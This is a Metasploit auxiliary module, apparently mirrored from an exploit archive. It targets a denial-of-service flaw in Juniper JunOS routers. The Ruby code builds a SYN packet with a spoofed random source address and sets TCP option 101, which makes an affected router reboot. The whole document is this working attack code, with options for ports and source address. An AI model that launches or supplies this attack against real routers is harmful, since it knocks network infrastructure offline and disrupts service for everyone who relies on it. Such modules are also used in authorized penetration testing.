Share
## https://sploitus.com/exploit?id=PACKETSTORM:180549
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Capture  
include Msf::Auxiliary::Dos  
  
def initialize  
super(  
'Name' => 'Juniper JunOS Malformed TCP Option',  
'Description' => %q{ This module exploits a denial of service vulnerability  
in Juniper Network's JunOS router operating system. By sending a TCP  
packet with TCP option 101 set, an attacker can cause an affected  
router to reboot.  
},  
'Author' => 'todb',  
'License' => MSF_LICENSE,  
'References' =>  
[  
['BID', '37670'],  
['OSVDB', '61538'],  
['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']  
]  
)  
  
register_options([  
OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),  
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),  
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])  
])  
  
deregister_options('FILTER','PCAPFILE', 'SNAPLEN')  
end  
  
def rport  
datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i  
end  
  
def sport  
datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i  
end  
  
def shost  
datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s  
end  
  
def run  
  
open_pcap  
  
p = PacketFu::TCPPacket.new  
p.ip_daddr = rhost  
p.ip_saddr = shost  
p.ip_ttl = rand(128) + 128  
p.tcp_sport = sport  
p.tcp_dport = rport  
p.tcp_flags.syn = 1  
p.tcp_win = rand(4096)+1  
p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol  
p.recalc  
print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")  
capture_sendto(p,rhost)  
close_pcap  
end  
end